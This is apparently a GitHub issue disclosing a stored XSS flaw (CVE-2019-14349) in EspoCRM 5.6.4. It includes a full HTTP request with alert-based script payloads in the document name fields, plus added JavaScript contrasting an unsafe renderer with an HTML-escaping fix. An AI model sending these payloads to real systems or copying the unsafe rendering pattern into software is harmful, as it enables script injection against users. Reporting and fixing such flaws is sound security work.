Stored XSS in filename #1358

Closed
dayn1ne opened this issue Jul 18, 2019 · 2 comments
dayn1ne commented Jul 18, 2019

Description

EspoCRM version 5.6.4 is vulnerable to stored XSS due to a lack of filtering of user-supplied data in the functionality for storing documents in the account tab. An attacker can upload a specially crafted file which contains JavaScript code in its name. The malicious JavaScript code will be executed when a user opens the page of any profile where there is a file with JavaScript in the filename.

But this file can be created only on Linux, or you can edit the field name in a local proxy (e.g. Burp Suite).

Request

POST /api/v1/Document HTTP/1.1
Host: espocrm.test
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Authorization: <your auth token>
Espo-Authorization: <your auth token>
Espo-Authorization-By-Token: true
X-Requested-With: XMLHttpRequest
Content-Length: 436
Cookie: <your cookie>
Connection: close

{"accountsIds":["5d30714c6b70a31b2"],"accountsNames":{"5d30714c6b70a31b2":"\"><svg/onload=alert()>"},"publishDate":"2019-07-18","assignedUserId":"1","assignedUserName":"Admin","name":"\"><img src=x onerror=alert(document.domain)>.jpeg","description":"document","fileId":"5d3073d65c36ce950","fileName":"\"><img src=x onerror=alert(document.domain)>.jpeg","status":"Active","folderName":null,"folderId":null,"teamsIds":[],"teamsNames":{}}

Vulnerable parameters

fileName and name

PoC

PoC screenshot (2019-07-18 16:33:17; image not included)
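The rendering defect the report describes, and the output-encoding fix it calls for, as an added example in JavaScript. This is not EspoCRM's code and not the referenced commit; the document object, the row template and the `isAcceptableFileName` policy are constructed assumptions, and the sample name reuses the payload quoted in the request above so the contrast between the unsafe and the hardened renderer is visible on the page's own input.

```javascript
// Added example, not EspoCRM code. Shows why a document name must be
// HTML-encoded for its context before being interpolated into markup,
// and what the hardened rendering produces on the report's own payload.

// Constructed record; the name/fileName values are the ones from the report.
const CONSTRUCTED_DOCUMENT = {
  id: '5d3073d65c36ce950',
  name: '"><img src=x onerror=alert(document.domain)>.jpeg',
  fileName: '"><img src=x onerror=alert(document.domain)>.jpeg',
};

// The five characters that can change HTML context. Encoding all of them
// is safe for both element text and double- or single-quoted attributes.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern (the defect class in the report): raw concatenation of
// user-controlled strings into an attribute and into element text.
function renderDocumentRowUnsafe(doc) {
  return `<a href="#Document/view/${doc.id}" title="${doc.fileName}">${doc.name}</a>`;
}

// Hardened pattern: every interpolated value is encoded for its context.
// The payload survives as visible text; it no longer creates an element.
function renderDocumentRowSafe(doc) {
  return `<a href="#Document/view/${escapeHtml(doc.id)}" `
    + `title="${escapeHtml(doc.fileName)}">${escapeHtml(doc.name)}</a>`;
}

// Structural oracle for tests and review: how many tag openers does the
// rendered fragment contain? A single row must contain exactly <a> and </a>.
function countTags(html) {
  return (html.match(/<[a-zA-Z!/]/g) || []).length;
}

// Defense in depth (assumed policy, not the project's): narrow what a stored
// document name may contain. Output encoding stays the primary control.
function isAcceptableFileName(name) {
  return typeof name === 'string'
    && name.length > 0
    && name.length <= 255
    && !/[<>\x00-\x1f\x7f\/\\]/.test(name);
}

console.log('unsafe:', renderDocumentRowUnsafe(CONSTRUCTED_DOCUMENT));
console.log('safe:  ', renderDocumentRowSafe(CONSTRUCTED_DOCUMENT));
console.log('tags unsafe/safe:',
  countTags(renderDocumentRowUnsafe(CONSTRUCTED_DOCUMENT)),
  countTags(renderDocumentRowSafe(CONSTRUCTED_DOCUMENT)));
```

The tag count makes the fix checkable without a browser: the unsafe row turns one link into four tag openers (the injected `<img>` appears once from the attribute break-out and once from the text context), while the encoded row always yields exactly two. The allowlist check is a secondary control; a name such as `Q&A report.pdf` is legitimate and must still render correctly, which is why the encoder, not the validator, carries the security guarantee.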

yurikuzn (Contributor) commented

Thanks. Fix: 03773dd

fgeek commented Aug 7, 2019

https://nvd.nist.gov/vuln/detail/CVE-2019-14349 has been assigned for this vulnerability.
